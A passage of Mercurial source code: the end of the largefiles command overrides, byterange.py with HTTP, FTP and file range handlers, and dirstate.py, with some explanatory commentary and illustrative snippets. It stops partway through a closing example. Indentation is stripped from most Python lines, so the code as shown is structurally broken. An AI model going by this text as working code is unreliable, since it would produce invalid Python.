lf = lfutil.splitstandin(f)
if lf is None:
return origmatchfn(f)
notbad.add(lf)
return origmatchfn(lf)
m.matchfn = lfmatchfn
origbadfn = m.bad
def lfbadfn(f, msg):
if not f in notbad:
return origbadfn(f, msg)
m.bad = lfbadfn
for f in ctx.walk(m):
fp = cmdutil.makefileobj(repo, opts.get('output'), ctx.node(),
pathname=f)
lf = lfutil.splitstandin(f)
if lf is None:
# duplicating unreachable code from commands.cat
data = ctx[f].data()
if opts.get('decode'):
data = repo.wwritedata(f, data)
fp.write(data)
else:
hash = lfutil.readstandin(repo, lf, ctx.rev())
if not lfutil.inusercache(repo.ui, hash):
store = basestore._openstore(repo)
success, missing = store.get([(lf, hash)])
if len(success) != 1:
raise util.Abort(
_('largefile %s is not in cache and could not be '
'downloaded') % lf)
path = lfutil.usercachepath(repo.ui, hash)
fpin = open(path, "rb")
for chunk in util.filechunkiter(fpin, 128 * 1024):
fp.write(chunk)
fpin.close()
fp.close()
err = 0
return err
def mercurialsinkbefore(orig, sink):
sink.repo._isconverting = True
orig(sink)
def mercurialsinkafter(orig, sink):
sink.repo._isconverting = False
orig(sink)
```
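All of the override functions above take the original implementation as their first argument, which is the calling convention expected by Mercurial's `extensions.wrapcommand()` and `extensions.wrapfunction()`. A minimal, hypothetical `uisetup()` sketch of how a few of them could be wired up (the real extension does this wiring elsewhere; the command names here are only examples):
```python
# Hypothetical wiring sketch -- not part of the file above.
from mercurial import commands, extensions, scmutil

def uisetup(ui):
    # Each wrapper receives the original callable as ``orig`` and decides
    # when to delegate to it.
    extensions.wrapcommand(commands.table, 'cat', overridecat)
    extensions.wrapcommand(commands.table, 'outgoing', overrideoutgoing)
    extensions.wrapcommand(commands.table, 'summary', overridesummary)
    extensions.wrapfunction(scmutil, 'addremove', scmutiladdremove)
```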
#### File: bin/mercurial/byterange.py
```python
import os
import stat
import urllib
import urllib2
import email.Utils
class RangeError(IOError):
"""Error raised when an unsatisfiable range is requested."""
pass
class HTTPRangeHandler(urllib2.BaseHandler):
"""Handler that enables HTTP Range headers.
    This was extremely simple. The Range header is an HTTP feature to
    begin with, so all this class does is tell urllib2 that the
    "206 Partial Content" response from the HTTP server is what we
    expected.
Example:
import urllib2
import byterange
        range_handler = byterange.HTTPRangeHandler()
opener = urllib2.build_opener(range_handler)
# install it
urllib2.install_opener(opener)
# create Request and set Range header
req = urllib2.Request('http://www.python.org/')
        req.add_header('Range', 'bytes=30-50')
f = urllib2.urlopen(req)
"""
def http_error_206(self, req, fp, code, msg, hdrs):
# 206 Partial Content Response
r = urllib.addinfourl(fp, hdrs, req.get_full_url())
r.code = code
r.msg = msg
return r
def http_error_416(self, req, fp, code, msg, hdrs):
# HTTP's Range Not Satisfiable error
raise RangeError('Requested Range Not Satisfiable')
class RangeableFileObject(object):
"""File object wrapper to enable raw range handling.
This was implemented primarily for handling range
specifications for file:// urls. This object effectively makes
a file object look like it consists only of a range of bytes in
the stream.
Examples:
# expose 10 bytes, starting at byte position 20, from
# /etc/aliases.
>>> fo = RangeableFileObject(file('/etc/passwd', 'r'), (20,30))
# seek seeks within the range (to position 23 in this case)
>>> fo.seek(3)
        # tell tells where you're at _within the range_ (position 3 in
# this case)
>>> fo.tell()
# read EOFs if an attempt is made to read past the last
# byte in the range. the following will return only 7 bytes.
>>> fo.read(30)
"""
def __init__(self, fo, rangetup):
"""Create a RangeableFileObject.
fo -- a file like object. only the read() method need be
supported but supporting an optimized seek() is
preferable.
rangetup -- a (firstbyte,lastbyte) tuple specifying the range
to work over.
The file object provided is assumed to be at byte offset 0.
"""
self.fo = fo
(self.firstbyte, self.lastbyte) = range_tuple_normalize(rangetup)
self.realpos = 0
self._do_seek(self.firstbyte)
def __getattr__(self, name):
"""This effectively allows us to wrap at the instance level.
Any attribute not found in _this_ object will be searched for
in self.fo. This includes methods."""
return getattr(self.fo, name)
def tell(self):
"""Return the position within the range.
This is different from fo.seek in that position 0 is the
first byte position of the range tuple. For example, if
this object was created with a range tuple of (500,899),
tell() will return 0 when at byte position 500 of the file.
"""
return (self.realpos - self.firstbyte)
def seek(self, offset, whence=0):
"""Seek within the byte range.
Positioning is identical to that described under tell().
"""
assert whence in (0, 1, 2)
if whence == 0: # absolute seek
realoffset = self.firstbyte + offset
elif whence == 1: # relative seek
realoffset = self.realpos + offset
elif whence == 2: # absolute from end of file
# XXX: are we raising the right Error here?
raise IOError('seek from end of file not supported.')
# do not allow seek past lastbyte in range
if self.lastbyte and (realoffset >= self.lastbyte):
realoffset = self.lastbyte
self._do_seek(realoffset - self.realpos)
def read(self, size=-1):
"""Read within the range.
This method will limit the size read based on the range.
"""
size = self._calc_read_size(size)
rslt = self.fo.read(size)
self.realpos += len(rslt)
return rslt
def readline(self, size=-1):
"""Read lines within the range.
This method will limit the size read based on the range.
"""
size = self._calc_read_size(size)
rslt = self.fo.readline(size)
self.realpos += len(rslt)
return rslt
def _calc_read_size(self, size):
"""Handles calculating the amount of data to read based on
the range.
"""
if self.lastbyte:
if size > -1:
if ((self.realpos + size) >= self.lastbyte):
size = (self.lastbyte - self.realpos)
else:
size = (self.lastbyte - self.realpos)
return size
def _do_seek(self, offset):
"""Seek based on whether wrapped object supports seek().
offset is relative to the current position (self.realpos).
"""
assert offset >= 0
seek = getattr(self.fo, 'seek', self._poor_mans_seek)
seek(self.realpos + offset)
self.realpos += offset
def _poor_mans_seek(self, offset):
"""Seek by calling the wrapped file objects read() method.
This is used for file like objects that do not have native
seek support. The wrapped objects read() method is called
to manually seek to the desired position.
offset -- read this number of bytes from the wrapped
file object.
raise RangeError if we encounter EOF before reaching the
specified offset.
"""
pos = 0
bufsize = 1024
while pos < offset:
if (pos + bufsize) > offset:
bufsize = offset - pos
buf = self.fo.read(bufsize)
if len(buf) != bufsize:
raise RangeError('Requested Range Not Satisfiable')
pos += bufsize
class FileRangeHandler(urllib2.FileHandler):
"""FileHandler subclass that adds Range support.
This class handles Range headers exactly like an HTTP
server would.
"""
def open_local_file(self, req):
import mimetypes
import email
host = req.get_host()
file = req.get_selector()
localfile = urllib.url2pathname(file)
stats = os.stat(localfile)
size = stats[stat.ST_SIZE]
modified = email.Utils.formatdate(stats[stat.ST_MTIME])
mtype = mimetypes.guess_type(file)[0]
if host:
host, port = urllib.splitport(host)
if port or socket.gethostbyname(host) not in self.get_names():
raise urllib2.URLError('file not on local host')
fo = open(localfile,'rb')
brange = req.headers.get('Range', None)
brange = range_header_to_tuple(brange)
assert brange != ()
if brange:
(fb, lb) = brange
if lb == '':
lb = size
if fb < 0 or fb > size or lb > size:
raise RangeError('Requested Range Not Satisfiable')
size = (lb - fb)
fo = RangeableFileObject(fo, (fb, lb))
headers = email.message_from_string(
'Content-Type: %s\nContent-Length: %d\nLast-Modified: %s\n' %
(mtype or 'text/plain', size, modified))
return urllib.addinfourl(fo, headers, 'file:'+file)
# FTP Range Support
# Unfortunately, a large amount of base FTP code had to be copied
# from urllib and urllib2 in order to insert the FTP REST command.
# Code modifications for range support have been commented as
# follows:
# -- range support modifications start/end here
from urllib import splitport, splituser, splitpasswd, splitattr, \
unquote, addclosehook, addinfourl
import ftplib
import socket
import mimetypes
import email
class FTPRangeHandler(urllib2.FTPHandler):
def ftp_open(self, req):
host = req.get_host()
if not host:
raise IOError('ftp error', 'no host given')
host, port = splitport(host)
if port is None:
port = ftplib.FTP_PORT
else:
port = int(port)
# username/password handling
user, host = splituser(host)
if user:
user, passwd = splitpasswd(user)
else:
passwd = None
host = unquote(host)
user = unquote(user or '')
passwd = unquote(passwd or '')
try:
host = socket.gethostbyname(host)
except socket.error, msg:
raise urllib2.URLError(msg)
path, attrs = splitattr(req.get_selector())
dirs = path.split('/')
dirs = map(unquote, dirs)
dirs, file = dirs[:-1], dirs[-1]
if dirs and not dirs[0]:
dirs = dirs[1:]
try:
fw = self.connect_ftp(user, passwd, host, port, dirs)
type = file and 'I' or 'D'
for attr in attrs:
attr, value = splitattr(attr)
if attr.lower() == 'type' and \
value in ('a', 'A', 'i', 'I', 'd', 'D'):
type = value.upper()
# -- range support modifications start here
rest = None
range_tup = range_header_to_tuple(req.headers.get('Range', None))
assert range_tup != ()
if range_tup:
(fb, lb) = range_tup
if fb > 0:
rest = fb
# -- range support modifications end here
fp, retrlen = fw.retrfile(file, type, rest)
# -- range support modifications start here
if range_tup:
(fb, lb) = range_tup
if lb == '':
if retrlen is None or retrlen == 0:
raise RangeError('Requested Range Not Satisfiable due'
' to unobtainable file length.')
lb = retrlen
retrlen = lb - fb
if retrlen < 0:
# beginning of range is larger than file
raise RangeError('Requested Range Not Satisfiable')
else:
retrlen = lb - fb
fp = RangeableFileObject(fp, (0, retrlen))
# -- range support modifications end here
headers = ""
mtype = mimetypes.guess_type(req.get_full_url())[0]
if mtype:
headers += "Content-Type: %s\n" % mtype
if retrlen is not None and retrlen >= 0:
headers += "Content-Length: %d\n" % retrlen
headers = email.message_from_string(headers)
return addinfourl(fp, headers, req.get_full_url())
except ftplib.all_errors, msg:
raise IOError('ftp error', msg)
def connect_ftp(self, user, passwd, host, port, dirs):
fw = ftpwrapper(user, passwd, host, port, dirs)
return fw
class ftpwrapper(urllib.ftpwrapper):
# range support note:
# this ftpwrapper code is copied directly from
# urllib. The only enhancement is to add the rest
# argument and pass it on to ftp.ntransfercmd
def retrfile(self, file, type, rest=None):
self.endtransfer()
if type in ('d', 'D'):
cmd = 'TYPE A'
isdir = 1
else:
cmd = 'TYPE ' + type
isdir = 0
try:
self.ftp.voidcmd(cmd)
except ftplib.all_errors:
self.init()
self.ftp.voidcmd(cmd)
conn = None
if file and not isdir:
# Use nlst to see if the file exists at all
try:
self.ftp.nlst(file)
except ftplib.error_perm, reason:
raise IOError('ftp error', reason)
# Restore the transfer mode!
self.ftp.voidcmd(cmd)
# Try to retrieve as a file
try:
cmd = 'RETR ' + file
conn = self.ftp.ntransfercmd(cmd, rest)
except ftplib.error_perm, reason:
if str(reason).startswith('501'):
# workaround for REST not supported error
fp, retrlen = self.retrfile(file, type)
fp = RangeableFileObject(fp, (rest,''))
return (fp, retrlen)
elif not str(reason).startswith('550'):
raise IOError('ftp error', reason)
if not conn:
# Set transfer mode to ASCII!
self.ftp.voidcmd('TYPE A')
# Try a directory listing
if file:
cmd = 'LIST ' + file
else:
cmd = 'LIST'
conn = self.ftp.ntransfercmd(cmd)
self.busy = 1
# Pass back both a suitably decorated object and a retrieval length
return (addclosehook(conn[0].makefile('rb'),
self.endtransfer), conn[1])
####################################################################
# Range Tuple Functions
# XXX: These range tuple functions might go better in a class.
_rangere = None
def range_header_to_tuple(range_header):
"""Get a (firstbyte,lastbyte) tuple from a Range header value.
Range headers have the form "bytes=<firstbyte>-<lastbyte>". This
function pulls the firstbyte and lastbyte values and returns
a (firstbyte,lastbyte) tuple. If lastbyte is not specified in
the header value, it is returned as an empty string in the
tuple.
Return None if range_header is None
Return () if range_header does not conform to the range spec
pattern.
"""
global _rangere
if range_header is None:
return None
if _rangere is None:
import re
_rangere = re.compile(r'^bytes=(\d{1,})-(\d*)')
match = _rangere.match(range_header)
if match:
tup = range_tuple_normalize(match.group(1, 2))
if tup and tup[1]:
tup = (tup[0], tup[1]+1)
return tup
return ()
def range_tuple_to_header(range_tup):
"""Convert a range tuple to a Range header value.
Return a string of the form "bytes=<firstbyte>-<lastbyte>" or None
if no range is needed.
"""
if range_tup is None:
return None
range_tup = range_tuple_normalize(range_tup)
if range_tup:
if range_tup[1]:
range_tup = (range_tup[0], range_tup[1] - 1)
return 'bytes=%s-%s' % range_tup
def range_tuple_normalize(range_tup):
"""Normalize a (first_byte,last_byte) range tuple.
Return a tuple whose first element is guaranteed to be an int
and whose second element will be '' (meaning: the last byte) or
an int. Finally, return None if the normalized tuple == (0,'')
as that is equivalent to retrieving the entire file.
"""
if range_tup is None:
return None
# handle first byte
fb = range_tup[0]
if fb in (None, ''):
fb = 0
else:
fb = int(fb)
# handle last byte
try:
lb = range_tup[1]
except IndexError:
lb = ''
else:
if lb is None:
lb = ''
elif lb != '':
lb = int(lb)
# check if range is over the entire file
if (fb, lb) == (0, ''):
return None
# check that the range is valid
if lb < fb:
raise RangeError('Invalid byte range: %s-%s' % (fb, lb))
return (fb, lb)
```
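A short, illustrative exercise of the helpers above on an in-memory stream (not part of byterange.py; it assumes the module is importable as `byterange` and, like the module itself, targets Python 2):
```python
import StringIO
import byterange

# "bytes=20-29" covers ten bytes; the helper returns an exclusive upper bound.
tup = byterange.range_header_to_tuple('bytes=20-29')
assert tup == (20, 30)
assert byterange.range_tuple_to_header(tup) == 'bytes=20-29'

fo = byterange.RangeableFileObject(StringIO.StringIO('x' * 100), tup)
assert fo.tell() == 0           # position 0 is the first byte of the range
assert len(fo.read(50)) == 10   # reads are clamped to the range
```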
#### File: bin/mercurial/dirstate.py
```python
import errno
from node import nullid
from i18n import _
import scmutil, util, ignore, osutil, parsers, encoding
import os, stat, errno, gc
propertycache = util.propertycache
filecache = scmutil.filecache
_rangemask = 0x7fffffff
class repocache(filecache):
"""filecache for files in .hg/"""
def join(self, obj, fname):
return obj._opener.join(fname)
class rootcache(filecache):
"""filecache for files in the repository root"""
def join(self, obj, fname):
return obj._join(fname)
class dirstate(object):
def __init__(self, opener, ui, root, validate):
'''Create a new dirstate object.
opener is an open()-like callable that can be used to open the
dirstate file; root is the root of the directory tracked by
the dirstate.
'''
self._opener = opener
self._validate = validate
self._root = root
self._rootdir = os.path.join(root, '')
self._dirty = False
self._dirtypl = False
self._lastnormaltime = 0
self._ui = ui
self._filecache = {}
@propertycache
def _map(self):
'''Return the dirstate contents as a map from filename to
(state, mode, size, time).'''
self._read()
return self._map
@propertycache
def _copymap(self):
self._read()
return self._copymap
@propertycache
def _foldmap(self):
f = {}
for name, s in self._map.iteritems():
if s[0] != 'r':
f[util.normcase(name)] = name
for name in self._dirs:
f[util.normcase(name)] = name
f['.'] = '.' # prevents useless util.fspath() invocation
return f
@repocache('branch')
def _branch(self):
try:
return self._opener.read("branch").strip() or "default"
except IOError, inst:
if inst.errno != errno.ENOENT:
raise
return "default"
@propertycache
def _pl(self):
try:
fp = self._opener("dirstate")
st = fp.read(40)
fp.close()
l = len(st)
if l == 40:
return st[:20], st[20:40]
elif l > 0 and l < 40:
raise util.Abort(_('working directory state appears damaged!'))
except IOError, err:
if err.errno != errno.ENOENT:
raise
return [nullid, nullid]
@propertycache
def _dirs(self):
return scmutil.dirs(self._map, 'r')
def dirs(self):
return self._dirs
@rootcache('.hgignore')
def _ignore(self):
files = [self._join('.hgignore')]
for name, path in self._ui.configitems("ui"):
if name == 'ignore' or name.startswith('ignore.'):
files.append(util.expandpath(path))
return ignore.ignore(self._root, files, self._ui.warn)
@propertycache
def _slash(self):
return self._ui.configbool('ui', 'slash') and os.sep != '/'
@propertycache
def _checklink(self):
return util.checklink(self._root)
@propertycache
def _checkexec(self):
return util.checkexec(self._root)
@propertycache
def _checkcase(self):
return not util.checkcase(self._join('.hg'))
def _join(self, f):
# much faster than os.path.join()
# it's safe because f is always a relative path
return self._rootdir + f
def flagfunc(self, buildfallback):
if self._checklink and self._checkexec:
def f(x):
try:
st = os.lstat(self._join(x))
if util.statislink(st):
return 'l'
if util.statisexec(st):
return 'x'
except OSError:
pass
return ''
return f
fallback = buildfallback()
if self._checklink:
def f(x):
if os.path.islink(self._join(x)):
return 'l'
if 'x' in fallback(x):
return 'x'
return ''
return f
if self._checkexec:
def f(x):
if 'l' in fallback(x):
return 'l'
if util.isexec(self._join(x)):
return 'x'
return ''
return f
else:
return fallback
def getcwd(self):
cwd = os.getcwd()
if cwd == self._root:
return ''
# self._root ends with a path separator if self._root is '/' or 'C:\'
rootsep = self._root
if not util.endswithsep(rootsep):
rootsep += os.sep
if cwd.startswith(rootsep):
return cwd[len(rootsep):]
else:
# we're outside the repo. return an absolute path.
return cwd
def pathto(self, f, cwd=None):
if cwd is None:
cwd = self.getcwd()
path = util.pathto(self._root, cwd, f)
if self._slash:
return util.pconvert(path)
return path
def __getitem__(self, key):
'''Return the current state of key (a filename) in the dirstate.
States are:
n normal
m needs merging
r marked for removal
a marked for addition
? not tracked
'''
return self._map.get(key, ("?",))[0]
def __contains__(self, key):
return key in self._map
def __iter__(self):
for x in sorted(self._map):
yield x
def iteritems(self):
return self._map.iteritems()
def parents(self):
return [self._validate(p) for p in self._pl]
def p1(self):
return self._validate(self._pl[0])
def p2(self):
return self._validate(self._pl[1])
def branch(self):
return encoding.tolocal(self._branch)
def setparents(self, p1, p2=nullid):
"""Set dirstate parents to p1 and p2.
        When moving from two parents to one, 'm' merged entries are
        adjusted to normal and previous copy records discarded and
returned by the call.
See localrepo.setparents()
"""
self._dirty = self._dirtypl = True
oldp2 = self._pl[1]
self._pl = p1, p2
copies = {}
if oldp2 != nullid and p2 == nullid:
# Discard 'm' markers when moving away from a merge state
for f, s in self._map.iteritems():
if s[0] == 'm':
if f in self._copymap:
copies[f] = self._copymap[f]
self.normallookup(f)
return copies
def setbranch(self, branch):
self._branch = encoding.fromlocal(branch)
f = self._opener('branch', 'w', atomictemp=True)
try:
f.write(self._branch + '\n')
f.close()
# make sure filecache has the correct stat info for _branch after
# replacing the underlying file
ce = self._filecache['_branch']
if ce:
ce.refresh()
except: # re-raises
f.discard()
raise
def _read(self):
self._map = {}
self._copymap = {}
try:
st = self._opener.read("dirstate")
except IOError, err:
if err.errno != errno.ENOENT:
raise
return
if not st:
return
# Python's garbage collector triggers a GC each time a certain number
# of container objects (the number being defined by
# gc.get_threshold()) are allocated. parse_dirstate creates a tuple
# for each file in the dirstate. The C version then immediately marks
# them as not to be tracked by the collector. However, this has no
# effect on when GCs are triggered, only on what objects the GC looks
# into. This means that O(number of files) GCs are unavoidable.
# Depending on when in the process's lifetime the dirstate is parsed,
# this can get very expensive. As a workaround, disable GC while
# parsing the dirstate.
gcenabled = gc.isenabled()
gc.disable()
try:
p = parsers.parse_dirstate(self._map, self._copymap, st)
finally:
if gcenabled:
gc.enable()
if not self._dirtypl:
self._pl = p
def invalidate(self):
for a in ("_map", "_copymap", "_foldmap", "_branch", "_pl", "_dirs",
"_ignore"):
if a in self.__dict__:
delattr(self, a)
self._lastnormaltime = 0
self._dirty = False
def copy(self, source, dest):
"""Mark dest as a copy of source. Unmark dest if source is None."""
if source == dest:
return
self._dirty = True
if source is not None:
self._copymap[dest] = source
elif dest in self._copymap:
del self._copymap[dest]
def copied(self, file):
return self._copymap.get(file, None)
def copies(self):
return self._copymap
def _droppath(self, f):
if self[f] not in "?r" and "_dirs" in self.__dict__:
self._dirs.delpath(f)
def _addpath(self, f, state, mode, size, mtime):
oldstate = self[f]
if state == 'a' or oldstate == 'r':
scmutil.checkfilename(f)
if f in self._dirs:
raise util.Abort(_('directory %r already in dirstate') % f)
# shadows
for d in scmutil.finddirs(f):
if d in self._dirs:
break
if d in self._map and self[d] != 'r':
raise util.Abort(
_('file %r in dirstate clashes with %r') % (d, f))
if oldstate in "?r" and "_dirs" in self.__dict__:
self._dirs.addpath(f)
self._dirty = True
self._map[f] = (state, mode, size, mtime)
def normal(self, f):
'''Mark a file normal and clean.'''
s = os.lstat(self._join(f))
mtime = int(s.st_mtime)
self._addpath(f, 'n', s.st_mode,
s.st_size & _rangemask, mtime & _rangemask)
if f in self._copymap:
del self._copymap[f]
if mtime > self._lastnormaltime:
# Remember the most recent modification timeslot for status(),
# to make sure we won't miss future size-preserving file content
# modifications that happen within the same timeslot.
self._lastnormaltime = mtime
def normallookup(self, f):
'''Mark a file normal, but possibly dirty.'''
if self._pl[1] != nullid and f in self._map:
# if there is a merge going on and the file was either
# in state 'm' (-1) or coming from other parent (-2) before
# being removed, restore that state.
entry = self._map[f]
if entry[0] == 'r' and entry[2] in (-1, -2):
source = self._copymap.get(f)
if entry[2] == -1:
self.merge(f)
elif entry[2] == -2:
self.otherparent(f)
if source:
self.copy(source, f)
return
if entry[0] == 'm' or entry[0] == 'n' and entry[2] == -2:
return
self._addpath(f, 'n', 0, -1, -1)
if f in self._copymap:
del self._copymap[f]
def otherparent(self, f):
'''Mark as coming from the other parent, always dirty.'''
if self._pl[1] == nullid:
raise util.Abort(_("setting %r to other parent "
"only allowed in merges") % f)
self._addpath(f, 'n', 0, -2, -1)
if f in self._copymap:
del self._copymap[f]
def add(self, f):
'''Mark a file added.'''
self._addpath(f, 'a', 0, -1, -1)
if f in self._copymap:
del self._copymap[f]
def remove(self, f):
'''Mark a file removed.'''
self._dirty = True
self._droppath(f)
size = 0
if self._pl[1] != nullid and f in self._map:
# backup the previous state
entry = self._map[f]
if entry[0] == 'm': # merge
size = -1
elif entry[0] == 'n' and entry[2] == -2: # other parent
size = -2
self._map[f] = ('r', 0, size, 0)
if size == 0 and f in self._copymap:
del self._copymap[f]
def merge(self, f):
'''Mark a file merged.'''
if self._pl[1] == nullid:
return self.normallookup(f)
s = os.lstat(self._join(f))
self._addpath(f, 'm', s.st_mode,
s.st_size & _rangemask, int(s.st_mtime) & _rangemask)
if f in self._copymap:
del self._copymap[f]
def drop(self, f):
'''Drop a file from the dirstate'''
if f in self._map:
self._dirty = True
self._droppath(f)
del self._map[f]
def _normalize(self, path, isknown, ignoremissing=False, exists=None):
normed = util.normcase(path)
folded = self._foldmap.get(normed, None)
if folded is None:
if isknown:
folded = path
else:
if exists is None:
exists = os.path.lexists(os.path.join(self._root, path))
if not exists:
# Maybe a path component exists
if not ignoremissing and '/' in path:
d, f = path.rsplit('/', 1)
d = self._normalize(d, isknown, ignoremissing, None)
folded = d + "/" + f
else:
# No path components, preserve original case
folded = path
else:
# recursively normalize leading directory components
# against dirstate
if '/' in normed:
d, f = normed.rsplit('/', 1)
d = self._normalize(d, isknown, ignoremissing, True)
r = self._root + "/" + d
folded = d + "/" + util.fspath(f, r)
else:
folded = util.fspath(normed, self._root)
self._foldmap[normed] = folded
return folded
def normalize(self, path, isknown=False, ignoremissing=False):
'''
normalize the case of a pathname when on a casefolding filesystem
isknown specifies whether the filename came from walking the
disk, to avoid extra filesystem access.
        If ignoremissing is True, missing paths are returned
unchanged. Otherwise, we try harder to normalize possibly
existing path components.
The normalized case is determined based on the following precedence:
- version of name already stored in the dirstate
- version of name stored on disk
- version provided via command arguments
'''
if self._checkcase:
return self._normalize(path, isknown, ignoremissing)
return path
def clear(self):
self._map = {}
if "_dirs" in self.__dict__:
delattr(self, "_dirs")
self._copymap = {}
self._pl = [nullid, nullid]
self._lastnormaltime = 0
self._dirty = True
def rebuild(self, parent, allfiles, changedfiles=None):
changedfiles = changedfiles or allfiles
oldmap = self._map
self.clear()
for f in allfiles:
if f not in changedfiles:
self._map[f] = oldmap[f]
else:
if 'x' in allfiles.flags(f):
self._map[f] = ('n', 0777, -1, 0)
else:
self._map[f] = ('n', 0666, -1, 0)
self._pl = (parent, nullid)
self._dirty = True
def write(self):
if not self._dirty:
return
st = self._opener("dirstate", "w", atomictemp=True)
def finish(s):
st.write(s)
st.close()
self._lastnormaltime = 0
self._dirty = self._dirtypl = False
# use the modification time of the newly created temporary file as the
# filesystem's notion of 'now'
now = util.fstat(st).st_mtime
finish(parsers.pack_dirstate(self._map, self._copymap, self._pl, now))
def _dirignore(self, f):
if f == '.':
return False
if self._ignore(f):
return True
for p in scmutil.finddirs(f):
if self._ignore(p):
return True
return False
def walk(self, match, subrepos, unknown, ignored):
'''
Walk recursively through the directory tree, finding all files
matched by match.
Return a dict mapping filename to stat-like object (either
mercurial.osutil.stat instance or return value of os.stat()).
'''
def fwarn(f, msg):
self._ui.warn('%s: %s\n' % (self.pathto(f), msg))
return False
def badtype(mode):
kind = _('unknown')
if stat.S_ISCHR(mode):
kind = _('character device')
elif stat.S_ISBLK(mode):
kind = _('block device')
elif stat.S_ISFIFO(mode):
kind = _('fifo')
elif stat.S_ISSOCK(mode):
kind = _('socket')
elif stat.S_ISDIR(mode):
kind = _('directory')
return _('unsupported file type (type is %s)') % kind
ignore = self._ignore
dirignore = self._dirignore
if ignored:
ignore = util.never
dirignore = util.never
elif not unknown:
# if unknown and ignored are False, skip step 2
ignore = util.always
dirignore = util.always
matchfn = match.matchfn
matchalways = match.always()
badfn = match.bad
dmap = self._map
normpath = util.normpath
listdir = osutil.listdir
lstat = os.lstat
getkind = stat.S_IFMT
dirkind = stat.S_IFDIR
regkind = stat.S_IFREG
lnkkind = stat.S_IFLNK
join = self._join
work = []
wadd = work.append
exact = skipstep3 = False
if matchfn == match.exact: # match.exact
exact = True
dirignore = util.always # skip step 2
elif match.files() and not match.anypats(): # match.match, no patterns
skipstep3 = True
if not exact and self._checkcase:
normalize = self._normalize
skipstep3 = False
else:
normalize = None
files = sorted(match.files())
subrepos.sort()
i, j = 0, 0
while i < len(files) and j < len(subrepos):
subpath = subrepos[j] + "/"
if files[i] < subpath:
i += 1
continue
while i < len(files) and files[i].startswith(subpath):
del files[i]
j += 1
if not files or '.' in files:
files = ['']
results = dict.fromkeys(subrepos)
results['.hg'] = None
# step 1: find all explicit files
for ff in files:
if normalize:
nf = normalize(normpath(ff), False, True)
else:
nf = normpath(ff)
if nf in results:
continue
try:
st = lstat(join(nf))
kind = getkind(st.st_mode)
if kind == dirkind:
skipstep3 = False
if nf in dmap:
#file deleted on disk but still in dirstate
results[nf] = None
match.dir(nf)
if not dirignore(nf):
wadd(nf)
elif kind == regkind or kind == lnkkind:
results[nf] = st
else:
badfn(ff, badtype(kind))
if nf in dmap:
results[nf] = None
except OSError, inst:
if nf in dmap: # does it exactly match a file?
results[nf] = None
else: # does it match a directory?
prefix = nf + "/"
for fn in dmap:
if fn.startswith(prefix):
match.dir(nf)
skipstep3 = False
break
else:
badfn(ff, inst.strerror)
# step 2: visit subdirectories
while work:
nd = work.pop()
skip = None
if nd == '.':
nd = ''
else:
skip = '.hg'
try:
entries = listdir(join(nd), stat=True, skip=skip)
except OSError, inst:
if inst.errno in (errno.EACCES, errno.ENOENT):
fwarn(nd, inst.strerror)
continue
raise
for f, kind, st in entries:
if normalize:
nf = normalize(nd and (nd + "/" + f) or f, True, True)
else:
nf = nd and (nd + "/" + f) or f
if nf not in results:
if kind == dirkind:
if not ignore(nf):
match.dir(nf)
wadd(nf)
if nf in dmap and (matchalways or matchfn(nf)):
results[nf] = None
elif kind == regkind or kind == lnkkind:
if nf in dmap:
if matchalways or matchfn(nf):
results[nf] = st
elif (matchalways or matchfn(nf)) and not ignore(nf):
results[nf] = st
elif nf in dmap and (matchalways or matchfn(nf)):
results[nf] = None
for s in subrepos:
del results[s]
del results['.hg']
# step 3: report unseen items in the dmap hash
if not skipstep3 and not exact:
if not results and matchalways:
visit = dmap.keys()
else:
visit = [f for f in dmap if f not in results and matchfn(f)]
visit.sort()
if unknown:
# unknown == True means we walked the full directory tree above.
# So if a file is not seen it was either a) not matching matchfn
# b) ignored, c) missing, or d) under a symlink directory.
audit_path = scmutil.pathauditor(self._root)
for nf in iter(visit):
# Report ignored items in the dmap as long as they are not
# under a symlink directory.
if audit_path.check(nf):
try:
results[nf] = lstat(join(nf))
except OSError:
# file doesn't exist
results[nf] = None
else:
# It's either missing or under a symlink directory
results[nf] = None
else:
# We may not have walked the full directory tree above,
# so stat everything we missed.
nf = iter(visit).next
for st in util.statfiles([join(i) for i in visit]):
results[nf()] = st
return results
def status(self, match, subrepos, ignored, clean, unknown):
'''Determine the status of the working copy relative to the
dirstate and return a tuple of lists (unsure, modified, added,
removed, deleted, unknown, ignored, clean), where:
unsure:
files that might have been modified since the dirstate was
written, but need to be read to be sure (size is the same
but mtime differs)
modified:
files that have definitely been modified since the dirstate
was written (different size or mode)
added:
files that have been explicitly added with hg add
removed:
files that have been explicitly removed with hg remove
deleted:
files that have been deleted through other means ("missing")
unknown:
files not in the dirstate that are not ignored
ignored:
files not in the dirstate that are ignored
(by _dirignore())
clean:
files that have definitely not been modified since the
dirstate was written
'''
listignored, listclean, listunknown = ignored, clean, unknown
lookup, modified, added, unknown, ignored = [], [], [], [], []
removed, deleted, clean = [], [], []
dmap = self._map
ladd = lookup.append # aka "unsure"
madd = modified.append
aadd = added.append
uadd = unknown.append
iadd = ignored.append
radd = removed.append
dadd = deleted.append
cadd = clean.append
mexact = match.exact
dirignore = self._dirignore
checkexec = self._checkexec
checklink = self._checklink
copymap = self._copymap
lastnormaltime = self._lastnormaltime
lnkkind = stat.S_IFLNK
for fn, st in self.walk(match, subrepos, listunknown,
listignored).iteritems():
if fn not in dmap:
if (listignored or mexact(fn)) and dirignore(fn):
if listignored:
iadd(fn)
elif listunknown:
uadd(fn)
continue
state, mode, size, time = dmap[fn]
if not st and state in "nma":
dadd(fn)
elif state == 'n':
# The "mode & lnkkind != lnkkind or self._checklink"
# lines are an expansion of "islink => checklink"
# where islink means "is this a link?" and checklink
# means "can we check links?".
mtime = int(st.st_mtime)
if (size >= 0 and
((size != st.st_size and size != st.st_size & _rangemask)
or ((mode ^ st.st_mode) & 0100 and checkexec))
and (mode & lnkkind != lnkkind or checklink)
or size == -2 # other parent
or fn in copymap):
madd(fn)
elif ((time != mtime and time != mtime & _rangemask)
and (mode & lnkkind != lnkkind or checklink)):
ladd(fn)
elif mtime == lastnormaltime:
# fn may have been changed in the same timeslot without
# changing its size. This can happen if we quickly do
# multiple commits in a single transaction.
# Force lookup, so we don't miss such a racy file change.
ladd(fn)
elif listclean:
cadd(fn)
elif state == 'm':
madd(fn)
elif state == 'a':
aadd(fn)
elif state == 'r':
radd(fn)
return (lookup, modified, added, removed, deleted, unknown, ignored,
clean)
```
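The `_rangemask` constant above exists because the on-disk dirstate packs `st_size` and `st_mtime` into 32-bit signed fields, which is why `status()` compares the stat value both raw and masked. A small standalone illustration (not part of dirstate.py):
```python
_rangemask = 0x7fffffff

st_size = 5 * 1024 ** 3             # a 5 GB file does not fit in 31 bits
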